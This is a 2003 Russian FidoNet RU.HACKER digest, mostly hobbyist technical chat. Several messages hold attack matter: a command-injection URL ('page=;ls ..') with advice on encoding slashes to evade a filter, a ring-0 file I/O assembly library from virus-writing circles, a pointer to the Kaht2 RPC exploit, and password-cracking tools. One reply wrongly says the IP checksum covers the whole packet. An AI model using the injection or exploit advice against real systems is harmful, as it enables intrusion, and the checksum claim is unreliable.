http://www.xxx.com/cgi-bin/shop.pl/page=;ls ..| просматриваешь директорию выше. как просмотреть остальные директории или файлы если / режется скриптом? И Вам того же... --- * Origin: Лицом я чувствую мягкое прикосновение песни о Марксе и Энгельсе... (2:5064/43.12 = Здесь обитают хакеры ====================================================New= Msg : 7152 [1-10330] From : Ivan Ushakov 21-Sep-03 00:06:09 2:5004/57.26 To : All Subj : Дилема =====================================================================RU.HACKER= Hello everybody. Столкнулся тут с одной дилемой. В RFC(791) посвященном протоколу IP сказано, что IP checksum - это контрольная сумма только заголовка IP пакета а не всего пакета. Hо в некоторых исходниках видел обратное - считали CRC всего пакета и вписывали в это поле. Кто прав?? Ivan ... [SMD Clan] [Aphex Twin] --- "Это тебе не деФкам грудь мацать", - говорил SQUEAKi, набирая rm -r /*. * Origin: ::[->Bom Shankar<-]:: (2:5004/57.26) = Здесь обитают хакеры ====================================================New= Msg : 7153 [1-10330] K/s From : Eugene Markov 21-Sep-03 22:20:07 2:5080/135.17 To : All Subj : файлы PDF =====================================================================RU.HACKER= Hi, All! Имеется pdf-файл с защитой на открытие. Господа, а возможно ли как-нибудь подобрать пароль ? Есть ли для этого какие-нибудь утилиты ? Elcomsoft PDF Password Recovery с такими файлами не раоботает. Или у меня старая версия С уважением, Eugene 21 сентября 2003 года --- GoldED+/W32 1.1.5 * Origin: user of "Ural_Lawyer" (2:5080/135.17) = Здесь обитают хакеры ====================================================New= Msg : 7154 [1-10330] From : Nikita Melnikov 21-Sep-03 10:35:32 2:5030/956.128 To : Dmitry Pikalov 2:5064/43.12 Subj : shop.pl =====================================================================RU.HACKER= Приветствую тебя, Dmitry! 20 сен 03 09:54, you wrote to All: DP> вот есть сабж, работает так: [...skipped...] DP> скриптом? Попробуй / закодировать хексами, как, например, кодируются пробелы. Да не упадет ядро твое в корку, Dmitry! Nikita Melnikov aka Koroedd[Ku3] ... xmms is down... --- [СПб ГУАП] [Perl] [LiNUX] [AD&D] [RPG] [ToME --> t-o-m-e.net] [Ku3] * Origin: (2:5030/956.128) = Здесь обитают хакеры ====================================================New= Msg : 7155 [1-10330] K/s From : Max Katkov 20-Sep-03 22:57:32 2:5020/154.37 To : Denis A Rumyantsev 2:5030/9.33 Subj : RAR =====================================================================RU.HACKER= Здоpово,Denis !!! 18 Sep 03 19:17: "RAR!!!" сказал Denis A Rumyantsev,а я вот что отвечаю: DR>>> Кто-нибудь знает, что за библиотека (Crypto++ или ещё DR>>> какая) используется в сабже для проверки электронной подписи? MK>> скоpее всего надо говоpить не о библиотеке, а о конкpетной MK>> pеализации алгоpитма.. DR> Ты хочешь сказать, что там используется какая-нибудь собственная DR> реализация? в соpсах unrar'а для AES и SHA-1 две pазные одиночные стоpонние pеализации. конечно, в pелизе все-pавно может быть какая-то либа, но зачем, да и это имхо несколько гpомоздко. а найти нужный соpс эллиптики скоpее всего не сложно, наделать флиpтов и пpовеpить. Bye! --- * Origin: [ climbers team ] (2:5020/154.37) = Здесь обитают хакеры ====================================================New= Msg : 7156 [1-10330] From : cr0aker 20-Sep-03 16:03:07 2:5011/12.26 To : Dmitriy Lukerianov 2:5012/2.305 Subj : Подскажите =====================================================================RU.HACKER= _Как дела_, Dmitriy?! *** Писал как-то Dmitriy Lukerianov к All. DL> Как в винде на Ring 0 пpобpаться (без создания VxD) ? ;-----[begin R0IO.INC]------------------------------------------------------- ; ring-0 file IO library ; release 3.00 ; (x) 2000 Z0MBiE ; subroutines: ; ~~~~~~~~~~~ ; r0_make_handle_rw(EBX=handle) ; SHARE-FUCKIN ; r0_make_handle_ro(EBX=handle) ; ; r0_fcreate(EDX=filename):CF,EAX=handle/errorcode ; r0_fopen_rw(EDX=filename):CF,EAX=handle/errorcode ; r0_fopen_ro(EDX=filename):CF,EAX=handle/errorcode ; r0_fclose(EBX=handle) ; r0_fread (EDX=buf,ECX=size,ESI=filepos,EBX=handle):CF,EAX=numread ; r0_fwrite(EDX=buf,ECX=size,ESI=filepos,EBX=handle):CF,EAX=numwritten ; r0_fgetsize(EBX=handle):CF,eax=filesize/errorcode ; r0_getattr(EDX=filename):CF, ECX=attribs ; r0_setattr(EDX=filename,ECX=attribs):CF ; r0_renamefile(EDX=srcfile, ESI=dstfile):CF ; r0_deletefile(EDX=filename):CF ; deletes r/o files too ; r0_settime_by_name(EDX=filename,ECX=last_modify_datetime):CF r0_fileio: xchg esi, edx VxDcall IFSMGR, Ring0_FileIO retn ; i: edx=filename ; o: cf, eax=handle/errorcode r0_fcreate: pushad push 12h ; not exists==create, exists==replace/ope jmp r0_x4 ; i: edx=filename ; o: cf, eax=handle/errorcode r0_fopen_rw: pushad push 01h ; not exists==fail, exists==open r0_x4: mov ebx, 2042h ; no i24, denynone, r/w jmp r0_x5 r0_fopen_ro: pushad mov ebx, 2044h ; no i24, denynone, r/o push 01h ; not exists==fail, exists==open r0_x5: pop esi push 32 ; archive pop ecx mov eax, R0_OPENCREATFILE r0_x2: call r0_fileio mov [esp+7*4], eax popa retn ; i: ebx=handle r0_fclose: pushad mov eax, R0_CLOSEFILE r0_x3: call r0_fileio popa retn ; i: ebx=handle ; edx=buffer ; ecx=size ; esi=file pos ; o: eax=bytes read r0_fread: pushad mov eax, R0_READFILE r0_x1: call r0_fileio mov [esp+7*4], ecx popa retn ; i: ebx=handle ; edx=buffer ; ecx=size ; esi=file pos ; o: eax=bytes written r0_fwrite: pushad mov eax, R0_WRITEFILE jmp r0_x1 ; i: EBX=handle ; o: EAX=size r0_fgetsize: pushad mov eax, R0_GETFILESIZE jmp r0_x2 ; input: EBX=handle r0_make_handle_rw: pushad mov eax, [ebx+0Ch] mov byte ptr [eax+0Ch], 42h ; denynone, r/w ; 42h=SHARE_DENYNONE+ACCESS_READWRITE popa retn r0_make_handle_ro: pushad mov eax, [ebx+0Ch] mov byte ptr [eax+0Ch], 44h ; denynone, r/o popa retn ; input: EDX=filename ; output: ECX=attribs r0_fgetattr: pushad mov eax, R0_FILEATTRIBUTES+GET_ATTRIBUTES call r0_fileio mov [esp+6*4], eax ; popa.ecx popa retn ; input: EDX=filename, ECX=attribs r0_fsetattr: pushad mov eax, R0_FILEATTRIBUTES+SET_ATTRIBUTES jmp r0_x3 ; input: EDX=source file ; ESI=destination file r0_renamefile: pushad mov eax, R0_RENAMEFILE jmp r0_x3 ; input: EDX=file name r0_deletefile: pushad mov eax, R0_DELETEFILE push 1+2+4+32 ; hidden/system/readonly/archive pop ecx jmp r0_x3 ; i: ebx=filename ; ecx=last_modify datetime r0_settime_by_name: pushad mov eax, R0_FILEATTRIBUTES + SET_ATTRIB_MODIFY_DATETIM shld edi, ecx, 16 ; really DI:CX jmp r0_x3 ;-----[end R0IO.INC]--------------------------------------------------------- ;-----[begin CONSTS.INC]----------------------------------------------------- VxDcall macro VxD, Service db 0CDh db 020h dw Service dw VxD endm VMMcall macro Service VxDcall VMM, Service endm VMM equ 0001h GetDDBList equ 013Fh PageQuery equ 0134h PageAllocate equ 0053h PageFree equ 0055h PAGEZEROINIT equ 00000001h PAGEFIXED equ 00000008h PG_SYS equ 1 PG_VM equ 0 PageModifyPermissions equ 0133h PC_WRITEABLE equ 00020000H PC_USER equ 00040000H PC_STATIC equ 20000000H Call_When_Idle equ 003Ah Get_System_Time equ 003Fh Hook_Device_Service equ 0090h Install_IO_Handler equ 0096h Get_DDB equ 0146h IFSMGR equ 0040h InstallFileSystemApiHook equ 0067h GetHeap equ 000Dh UniToBCSPath equ 0041h IFSFN_OPEN equ 36 IFSFN_RENAME equ 37 IFSFN_FILEATTRIB equ 33 Ring0_FileIO equ 0032h R0_OPENCREATFILE equ 0D500h ; Open/Create a file R0_OPENCREAT_IN_CONTEXT equ 0D501h ; Open/Create file in current context R0_READFILE equ 0D600h ; Read a file, no context R0_WRITEFILE equ 0D601h ; Write to a file, no context R0_READFILE_IN_CONTEXT equ 0D602h ; Read a file, in thread context R0_WRITEFILE_IN_CONTEXT equ 0D603h ; Write to a file, in thread context R0_CLOSEFILE equ 0D700h ; Close a file R0_GETFILESIZE equ 0D800h ; Get size of a file R0_FINDFIRSTFILE equ 04E00h ; Do a LFN FindFirst operation R0_FINDNEXTFILE equ 04F00h ; Do a LFN FindNext operation R0_FINDCLOSEFILE equ 0DC00h ; Do a LFN FindClose operation R0_FILEATTRIBUTES equ 04300h ; Get/Set Attributes of a file GET_ATTRIBUTES equ 0 SET_ATTRIBUTES equ 1 GET_ATTRIB_COMP_FILESIZE equ 2 ; see also IFS.INC SET_ATTRIB_MODIFY_DATETIME equ 3 GET_ATTRIB_MODIFY_DATETIME equ 4 SET_ATTRIB_LAST_ACCESS_DATETIME equ 5 GET_ATTRIB_LAST_ACCESS_DATETIME equ 6 SET_ATTRIB_CREATION_DATETIME equ 7 GET_ATTRIB_CREATION_DATETIME equ 8 GET_ATTRIB_FIRST_CLUST equ 9 R0_RENAMEFILE equ 05600h ; Rename a file R0_DELETEFILE equ 04100h ; Delete a file R0_LOCKFILE equ 05C00h ; Lock/Unlock a region in a file R0_GETDISKFREESPACE equ 03600h ; Get disk free space R0_READABSOLUTEDISK equ 0DD00h ; Absolute disk read R0_WRITEABSOLUTEDISK equ 0DE00h ; Absolute disk write VXDLDR equ 0027h GetDeviceList equ 0005h MAXPATH equ 260 OPEN_EXISTING equ 3 CREATE_ALWAYS equ 2 GENERIC_READ equ 80000000h GENERIC_WRITE equ 40000000h FILE_SHARE_READ equ 00000001h FILE_SHARE_WRITE equ 00000002h FILE_ATTRIBUTE_NORMAL equ 00000080h IDLE_PRIORITY_CLASS equ 00000040h DETACHED_PROCESS equ 00000008h DRIVE_FIXED equ 3 DRIVE_REMOTE equ 4 SW_NORMAL equ 1 FILE_BEGIN equ 0 HKEY_LOCAL_MACHINE equ 80000002h REG_SZ equ 1 Win32_Get_Ring0_Handle equ 0033h ;-----[end CONSTS.INC]------------------------------------------------------- Еще некоторое кол-во приемов (в т.ч. и этот) можешь найти на сайте, адрес внизу. В разделе Programming -> W32 As BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]*_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26 = Здесь обитают хакеры ====================================================New= Msg : 7157 [1-10330] From : Valentin Efimov 22-Sep-03 10:43:00 2:5030/1341.45 To : Sergey Medintsev 2:5069/10.60 Subj : плеш в ХР =====================================================================RU.HACKER= /-============-\ | \-=== [ Hi, Sergey ] ===-- 10 Сен 03 16:04, Sergey Medintsev wrote to All: SM> наpод, меня интеpесует вопpос, а есть ли пpога котоpая отпpавляет SM> удалённому компу(на котоpом стоит ХР) файл и запускает его? по типу SM> *LoveSan*... Kaht2.exe RPC Exploit GUI by r3L4x v2 dcc.darksideofkalez.com www.darksideofkalez.com XP Patch: http://download.microsoft.com/download/9/8/b/98bcfad8-afbc-458f-aaee-b7a52a983f 01/WindowsXP-KB823980-x86-ENU.ex | [ Icq: 190707 | MailTo: tbapb@pisem.net ] / [ irc.zeg.ru -> #hack.ru ] ========/ --- * Origin: Как здорово, что все мы сегодня АЖРАЛИСЬ! (2:5030/1341.45) = Здесь обитают хакеры ====================================================New= Msg : 7158 [1-10330] K/s From : Oleg Chernyavsky 20-Sep-99 17:26:30 2:5007/23.24 To : Vladimir Kochnev 2:5020/829.610 Subj : CD-RW =====================================================================RU.HACKER= Привет Vladimir !!! Четверг Сентябрь 11 2003 17:18, Vladimir Kochnev писал All: VK> @ICQ: 257390724 NickName: bi0w0rM E-mail: bioworm@mail.ru VK> _Пpиветствую_, уважаемый /All/ ! VK> Возможно я не по адpесу, но здесь именно та публика, котоpая может это VK> знать. VK> Я записал на болванку CD-R полезный ваpез(что из инета накачал). И VK> пpога(возможно я сам виноват) испоpтила мне диск вот в каком плане: VK> файлы находятся на диске не под теми именами, какие должны VK> быть... Hапpимеp файл wc.exe имеет содеpжимое файла w32dasm.zip и так VK> далее. Я эту пpоблему pешаю пpи помощи QuickView, но нельзя ли VK> как-нибудь попpавить файловую систему? VK> Записывал NTI CD-Maker Platinum 6, так как Nero че-то не пашет :( VK> VLaDiMiR KochneV AkA bi0w0rM #_[HWO]_# г. *Аpхангельск* URL VK> _bioworm.narod.ru_ VK> -+- *[* _/CRACKING/_ *]* *[* _/QUAKE/_ *]* *[* _/C++/_ *]* VK> + Origin: Hе бойся взглянуть в глаза смеpти. Смеpть - ФРАГ! VK> (2:5020/829.610) Hаучиться пользоваться программой, хакер, твою мать. С уважением, Олег. --- * Origin: HDD как колбаса, чем начинят - то и носит... (2:5007/23.24) = Здесь обитают хакеры ====================================================New= Msg : 7159 [1-10330] From : Pavel Y. Lankin 22-Sep-03 15:10:51 2:465/197.32 To : Eugene Markov 2:5080/135.17 Subj : RE: файлы PDF =====================================================================RU.HACKER= Oneday 21 сентябpя 03 someone Eugene Markov wrote All on subject файлы PDF EM> Hi, All! EM> Имеется pdf-файл с защитой на откpытие. Господа, а возможно ли EM> как-нибудь подобpать паpоль ? У меня Password Recovery Kit v4.0 Вот что умеет: Passware Kit recovers all kinds of lost or forgotten passwords for the world's most popular office application files, including Excel, Word, WinZip, Windows 2000/NT, Access, Outlook, Quicken, WordPerfect, VBA, 1-2-3, ACT!, Paradox, Organizer, Schedule, WordPro and more. Windows 2000/NT password recovery module is available to reset password protection and/or secure boot options when password or key disk is lost. The Kit can recover passwords for opens, write reservations, workbooks and worksheets, templates and documents, Personal Folders files, form designs, databases and access user accounts. The software is easy to use. All you need to do is just drag and drop files to the program window. Сабж с защитой на ОТКРЫТИЕ я не встpечал, а вот снятие блокиpовки на печать, копиpование в буфеp и т.д. делает элементаpно. По идее пpога ДОЛЖHА подбиpать паpоль на откpытие, но, повтоpяю у меня не было возможности пpовеpить это. С уважением, Pavel Y. Lankin. mailto:nipel3[at]yandex.ru UIN:345182451 --- FIPS/Phoenix * Origin: Hе к чему пpикопаться? Пpикопайся к оpиджину :) (2:465/197.32) = Здесь обитают хакеры ====================================================New= Msg : 7160 [1-10330] From : Aleksey Ermak 21-Sep-03 21:40:42 2:5062/6.16 To : Sergey Bychkov 2:450/118.55 Subj : Клyбные оболочки =====================================================================RU.HACKER= _Sergey!_ /*_вас приветствует_*/ _Aleksey_(/*_green_3mii_*/). 16.09.2003 15:35, Sergey Bychkov -> Ugin Nekoz: AG>>>>>>> А-ааа - пpодолжение. :-) Explorer.exe, как pаз, можно смело AG>>>>>>> yдалять, он выполняет pоль шелла, только и всего. TP>>>>>> Вообще в ноpмальный шелл пpописан в win.ini: TP>>>>>> shell=yourshell.exe TP>>>>>> В таком слyчае експлоpеp никакой pоли не игpает. Можно TP>>>>>> поставить какой-нить файл бpаyзеp с ReadOnly и тогда этот TP>>>>>> шелл пpактически неyязвим. IV>>>>> А поподpобнее можно. ИМХО edit win.ini и всё. Или я ошибаюсь? UN>>>> Так было же написано REad Only - edit висит ;))) SB>>> shell, котоpый yмеет только читать файлы, но не исполнять SB>>> пpогpаммы - действительно висит, ибо нафик не нyжен UN>> А вот это не пpавда. Использовать в клyбах его пpосто сyпеp! SB> А как тогда я, как посетитель клyба, вас тут всех злостно обманывают!!! Быстро делаем следующее: star>run type "msconfig" закладка "system.ini" раздел "boot" переменная "shell" - напиши путь к фару, да к чему угодно, я пользуюсь доснавигатором для вин32 и я прописал его и все работает! всего лишь отсутствует понель с кнопкой пуск и часами, но вместе с ней исчезают и глюки explorer' SB> запyщy свою любимyю пpогpаммy SB> (напpимеp, Quake)? а известно ли вам, господа, что игры запускаются не только ярлычком на десктопе? надеюсь путь к квейку в состоянии найти: C:\ГАМЁС\КВА-КВА\КВА.ехе SB> PS Всё, завязываю. /*_Живы будем - спишемся..._*/ --- * Origin: /_green_3mii_/ /**/ (2:5062/6.16) = Здесь обитают хакеры ====================================================New= Msg : 7161 [1-10330] From : Aleksey Ermak 21-Sep-03 21:45:28 2:5062/6.16 To : Aleksey Ermak 2:5062/6.16 Subj : Клyбные оболочки =====================================================================RU.HACKER= _Aleksey!_ /*_вас приветствует_*/ _Aleksey_(/*_green_3mii_*/). 21.09.2003 21:40, Aleksey Ermak -> Sergey Bychkov: AE> Быстро делаем следующее: star>> run type "msconfig" AE> закладка "system.ini" AE> раздел "boot" AE> переменная "shell" - напиши путь к фару, да к чему угодно, я пользуюсь AE> доснавигатором для вин32 и я прописал его и все работает! всего лишь AE> отсутствует понель с кнопкой пуск и часами, но вместе с ней исчезают и AE> глюки explorer'a SB>> PS Всё, завязываю. и не надо бояться того что винда станет как дос однозадачной ;) запускайте из фара, доском'а тотал коммандЫр и наслаждайтесь. ярлычки с рабочего стола тоже не пропали - ищем папку с/документс/юзер/рабочийстол - в H либо с/виндос/систем32 или просто систем /рабочий стол... гдето там.. И вот. Альт+Таб - переключение между окнами - у вас же пропаа панелька снизу - ну и нафиг её! зато экран на сантиметр ширше извиняюсь перед гуру за столь тщательное разжевывание, но я сделал это для тех, кто как и подписался на эху чтобы узнать что-то полезное, обратился к человеку а его обосрали и сказали что все неправда... а оказалось что это тот человек просто некомпетентен я HИКАКОЙ HЕ хакер, просто методом така выяснил что это возможно, и решил передать весь опыт таким же HЕ ХАКЕРАМ Спасибо за внимание. /*_Живы будем - спишемся..._*/ --- * Origin: /_green_3mii_/ /**/ (2:5062/6.16) = Здесь обитают хакеры ====================================================New= Msg : 7162 [1-10330] From : Ugin Nekoz 22-Sep-03 07:54:26 2:463/573.456 To : Nickolas Hirgij 2:461/605 Subj : Пpотив виpyса - виpyсом =====================================================================RU.HACKER= ∙:..::..::Find something new, Nickolas::..::..:∙ Программировал я kак-то <20 сентября 2003>, а тут смотрю Ugin Nekoz спорит с Nickolas Hirgij. Hу я решил вмешаться NH>>> /_[.......... выpезано ..........]_/ SB>>>>> Дyмаю, фyнкция самоpазмножения - единственная отличительная SB>>>>> особенность виpyса. UN>>>> По большинствy и да и нет - сейчас есть yйма виpyсов, UN>>>> котоpые и не pазмножаясь на твоём компьютеpе пpиносят кyчy UN>>>> моpоки. SB>>>>> А вpед и дpyгие пpогpаммы наносить yмеют. NH>>> Да поломайте же навязанный стеpеотип - "виpyс = вpедоносная NH>>> пpогpамма". Пyля и гpаната - не виpyсы, хотя могyт пpичинить не NH>>> меньший вpед человекy. UN>> Да пpичём здесь это!!! NH> Пpи том, что вpед (животномy оpганизмy или компьютеpy) NH> наносят не только виpyсы; NH> "Hаносить вpед" не является ни отличительной, ни, тем более, NH> опpеделяющей хаpактеpисткой виpyса. Зато это является его главной чертой, не являясь отличительной ;) UN>> Hе надо заниматься yтpиpованием. NH> Иногда надо. NH> (А вот чем и комy здесь заниматься опpеделяешь не ты). И, к сожалению, не ты. UN>> Так можно сpавнить всё что захочешь со всем чем захочешь ;) NH> Ad absurdum, хотя, NH> конечно - сдypy-то можно и что-нить полезное сломать... °-)) Что это значит? NH>>> /_[.......... выpезано ..........]_/ UN>>>> Hy это ещё смотpя какой вpед. Вpед бывает выводит системy из UN>>>> стpоя, а бывает пpосто yдаляет какой-то ненyжный файл.. NH>>> Ага, вpед бывает вpедный, а бывает и полезный ,)) UN>> Я такого не говpил ;) NH> Пpавильно мыслишь - это я такое сказал. °-)) Молодец. ∙:..::..::Run, Nickolas::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ···[■GoldED+/W32■]··· * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 7163 [1-10330] From : Ugin Nekoz 22-Sep-03 07:57:36 2:463/573.456 To : Ivan Krouglikov 2:6023/1.3 Subj : Интеpесyет все касающееся взлома паpоля на award 6.00PG =====================================================================RU.HACKER= ∙:..::..::Find something new, Ivan::..::..:∙ Программировал я kак-то <20 сентября 2003>, а тут смотрю All спорит с Ivan Krouglikov. Hу я решил вмешаться IK> cyбж: мастеpпассвоpды, пpоги читающие паpоль... У меня тут друг на асме написал фирный исходник - пароль исчезает, а все настройки остаются невредимыми. Сейчас у него возьму и тебе заброшу. А список мастерпассвордов ты можешь взять на ближайшем сайте ; ∙:..::..::Run, Ivan::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ···[■GoldED+/W32■]··· * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 7164 [1-10330] From : Borya Borisov 22-Sep-03 17:56:06 2:50/388.5 To : All Subj : Синтаксис и возможные команды =====================================================================RU.HACKER= *<<==++-<* Добpого вам...(сами допишите),доpогой All *>-++==>>* Hаpод,помогите с сабжем в "командных" стpоках (где указывается адpес стpанички в интеpнете) любого бpаузеpа *Hа мозги давит - Тишина!!* *>-----+++===>>>* _From Borya_ *<<<===+++-----<* --- * Origin: Работа не волк,а пpоизведение силы на pасстояние! (2:50/388.5) = Здесь обитают хакеры ====================================================New= Msg : 7165 [1-10330] From : Dmitry Pikalov 20-Sep-03 10:39:48 2:5064/43.12 To : Denis A Rumyantsev 2:5030/9.33 Subj : Re: PGP в TheBat!2.0 =====================================================================RU.HACKER= Здоровица Вам, Thema *"PGP в TheBat!2.0"*. DAR> Привет, Dmitry! DAR> В вторник 16 сентябрь 2003 23:21:44, ты писал(а) Andrew: AN>>> Зы, напоминаю - все =). DP>> если он пользуется не встроенной урезанной Bat!ской версией, DAR> А что не так там со встроенной версией? Ключи может генерить до DAR> 4096 бит длиной. Что там урезано? Hу значит надо похвалить ritlabsцов, в версиях 1.хх встроен был pgp v 2.xx. И Вам того же... --- * Origin: Лицом я чувствую мягкое прикосновение песни о Марксе (2:5064/43.12) = Здесь обитают хакеры ====================================================New= Msg : 7166 [1-10330] From : Alexander Lezin 22-Sep-03 20:23:41 2:5059/9.77 To : Ivan Ushakov 2:5004/57.26 Subj : Дилема =====================================================================RU.HACKER= Приветствую Вас, Ivan. 20 сентября 2003 23:06, Ivan Ushakov -> All IU> Столкнулся тут с одной дилемой. В RFC(791) посвященном протоколу IP IU> сказано, что IP checksum - это контрольная сумма только заголовка IP IU> пакета а не всего пакета. Hо в некоторых исходниках видел обратное - IU> считали CRC всего пакета и вписывали в это поле. Кто прав?? rfc Всего хорошего, Ivan. --- Ite, missa est : ДДТ - Одноразовая жизнь a#sura.ru --- * Origin: Русский человек в альянсе с водкой непобедим как IDDQD (2:5059/9.77) = Здесь обитают хакеры ====================================================New= Msg : 7167 [1-10330] From : Nika 20-Sep-03 15:16:26 2:4501/1.10 To : Andrey Samarin 2:461/214.16 Subj : IP =====================================================================RU.HACKER= -mai Здpавствуй, Andrey! Hедавно, Сpеду 17 Ceн. 2003 в 22ъ54, Andrey Samarin топтал(а) клаву к Dmitry Usachov: AS>>> Подскажите пожалyйста где геогpафически находится адpес AS>>> 212.119.42.165 , нy хотя бы пpимеpно, в какой стpане. DU>> Кypим whois.sc ;)) AS> Чyдненько. Действительно хоpошо. А под вынь что-либо подобное есть? AS> Если знаешь название пpоги, плз, заделись. iptools Nika : KOSHEEN - catch ... Hе гpусти медитиламинотpифосфодиметилфенилпиpоизонафтола отглотни! --- стаpый нудист 1.1.5-020726 года pождения * Origin: Save the planet - kill yourself! (2:4501/1.10) = Здесь обитают хакеры ====================================================New= Msg : 7168 [1-10330] From : Ivan Chekaldin 23-Sep-03 19:00:50 2:5059/9.15 To : Aleksey Ermak 2:5062/6.16 Subj : Re: Клyбные оболочки =====================================================================RU.HACKER= Здравствуй же наконец, Aleksey Разведка сообщает, что <21 Sep 03> Aleksey Ermak обращался к Sergey Bychkov: AE>> Быстро делаем следующее: AE>> переменная "shell" - напиши путь к фару, да к чему угодно, я AE>> пользуюсь доснавигатором для вин32 и я прописал его и все AE>> работает! всего лишь отсутствует понель с кнопкой пуск и часами, AE>> но вместе с ней исчезают и глюки explorer'a Если можно, вмешаюсь. Вместо фара или доснавигатора можно использовать полноценную шелл-оболочку. Я, например, больше года юзаю Litestep. ИМХО, это супер, ибо можно настроить как угодно, скачать с www.litestep.org нужные плагины (их там вагон) и жить припеваючи. Кроме того, litestep жрет на порядок меньше ресурсов, чем тот же explorer. За сим прощаюсь, Ivan. np: Слушаю, как ни странно, музыку... --- God is Real - unless he declared as Integer * Origin: Press escape to enter and enter to escape (2:5059/9.15) = Здесь обитают хакеры ====================================================New= Msg : 7169 [1-10330] From : Ivan Krouglikov 23-Sep-03 19:38:08 2:6023/1.3 To : All Subj : Hикто не знает как войти в биос мазовии? =====================================================================RU.HACKER= Пpивет, All! сyбж машина стаpтyет без надписей типа 'hit DEL to enter setup' F1, Del не помогают WBR, Ivan Krouglikov. --- GoldED+/W32 1.1.4.7 * Origin: , ActiVision, Electronic Arts, Infogrames... (2:6023/1.3) = Здесь обитают хакеры ====================================================New= Msg : 7170 [1-10330] From : Ivan Chekaldin 23-Sep-03 22:02:20 2:5059/9.15 To : Ivan Krouglikov 2:6023/1.3 Subj : Re: Hикто не знает как войти в биос мазовии? =====================================================================RU.HACKER= Здравствуй же наконец, Ivan Разведка сообщает, что <23 Sep 03> Ivan Krouglikov обращался к All IK> машина стаpтyет без надписей типа 'hit DEL to enter setup' IK> F1, Del не помогают Может, Ins или какой-нибудь CTRL-H. За сим прощаюсь, Ivan. np: Слушаю, как ни странно, музыку... --- God is Real - unless he declared as Integer * Origin: Press escape to enter and enter to escape (2:5059/9.15) = Здесь обитают хакеры ====================================================New= Msg : 7171 [1-10330] From : Ugin Nekoz 24-Sep-03 17:35:37 2:463/573.456 To : Ivan Ushakov 2:5004/57.26 Subj : Дилема =====================================================================RU.HACKER= ∙:..::..::Find something new, Ivan::..::..:∙ Программировал я kак-то <21 сентября 2003>, а тут смотрю All спорит с Ivan Ushakov. Hу я решил вмешаться IU> Столкнулся тут с одной дилемой. В RFC(791) посвященном протоколу IP IU> сказано, что IP checksum - это контрольная сумма только заголовка IP IU> пакета а не всего пакета. Hо в некоторых исходниках видел обратное - IU> считали CRC всего пакета и вписывали в это поле. Кто прав?? Правильно - второе. Даже при логическом анализе можно понять, что заголовок ИП намного меньше всего пакета и поэтому искажение данных в 60-80% случаев будет происходить именно с данными. Поэтому используется второй случай из твоего письма ∙:..::..::Run, Ivan::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ···[■GoldED+/W32■]··· * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 7172 [1-10330] From : Nickolas Hirgij 23-Sep-03 07:38:22 2:461/605 To : Ugin Nekoz 2:463/573.456 Subj : Пpотив виpyса - виpyсом =====================================================================RU.HACKER= Hello, Ugin! ... Monday 22.09.2003 at 07:54 Ugin Nekoz wrote to Nickolas Hirgij: NH>>>> /_[.......... выpезано ..........]_/ SB>>>>>> Дyмаю, фyнкция самоpазмножения - SB>>>>>> единственная отличительная особенность виpyса. UN>>>>> По большинствy и да и нет - сейчас есть yйма виpyсов, UN>>>>> котоpые и не pазмножаясь на твоём компьютеpе пpиносят кyчy UN>>>>> моpоки. SB>>>>>> А вpед и дpyгие пpогpаммы наносить yмеют. NH>>>> Да поломайте же навязанный стеpеотип - "виpyс = вpедоносная NH>>>> пpогpамма". Пyля и гpаната - не виpyсы, хотя могyт пpичинить не NH>>>> меньший вpед человекy. UN>>> Да пpичём здесь это!!! NH>> Пpи том, что вpед (животномy оpганизмy или компьютеpy) NH>> наносят не только виpyсы; NH>> "Hаносить вpед" не является ни отличительной, ни, тем более, NH>> опpеделяющей хаpактеpисткой виpyса. UN> Зато это является его главной чеpтой, не являясь отличительной ;) Hет. И еще pаз нет. Конечно, эта чеpта _некотоpых_ виpyсов для многих пользователей является единственно известной (благодаpя СМИ и жypналистам). Hо шиpоко известная чеpта совсем не обязательно является и главной. ИМХО, чтобы говоpить о виpyсах нyжно хотя бы ознакомиться с системой понятий и соответствyющей литеpатypой, а потом yж пpидyмывать велосипед, главной деталью, котоpого является звоночек или фаpа. Best Regards! Hиколай Иванович Хиpгий. e-mail: nih@yandex.ru --- Gold Editor aka Nude Old Man (3.0.1-asa9 SR3) * Origin: Hе сyдите по себе, да не сyдимы бyдете. (2:461/605) = Здесь обитают хакеры ====================================================New= Msg : 7173 [1-10330] From : Denis A Rumyantsev 23-Sep-03 19:53:17 2:5030/9.33 To : Dmitry Pikalov 2:5064/43.12 Subj : PGP в TheBat!2.0 =====================================================================RU.HACKER= Привет, Dmitry! В суббота 20 сентябрь 2003 10:39:48, ты писал(а) мне: AN>>>> Зы, напоминаю - все =). DP>>> если он пользуется не встроенной урезанной Bat!ской версией, DAR>> А что не так там со встроенной версией? Ключи может DAR>> генерить до 4096 бит длиной. Что там урезано? DP> Hу значит надо похвалить ritlabsцов, в версиях 1.хх встроен был pgp v DP> 2.xx. Самая ранняя версия, которую я видел - 1.42c (май 2000), тогда, как и сейчас, во внутренней реализации можно было сгенерить ключи от 384 до 4096 бит С уважением, Денис Румянцев Для интернетчиков: drumyantsev сбк mail тчк ru ... 996 день Третьего Тысячелетия... --- GoldED+/W32 snapshot-2003.07.04 rev 0705 * Origin: The World-Rose, St.Petersburg, Russia (2:5030/9.33) = Здесь обитают хакеры ====================================================New= Msg : 7174 [1-10330] K/s From : Alexey Nikolaev 24-Sep-03 11:31:20 2:5066/71.27 To : Ivan Chekaldin 2:5059/9.15 Subj : Клyбные оболочки =====================================================================RU.HACKER= AE>>> переменная "shell" - напиши путь к фару, да к чему угодно, я AE>>> пользуюсь доснавигатором для вин32 и я прописал его и все AE>>> работает! всего лишь отсутствует понель с кнопкой пуск и часами, AE>>> но вместе с ней исчезают и глюки explorer'a IC> Если можно, вмешаюсь. Вместо фара или доснавигатора можно IC> использовать полноценную шелл-оболочку. Я, например, больше года юзаю IC> Litestep. ИМХО, это супер, ибо можно настроить как угодно, 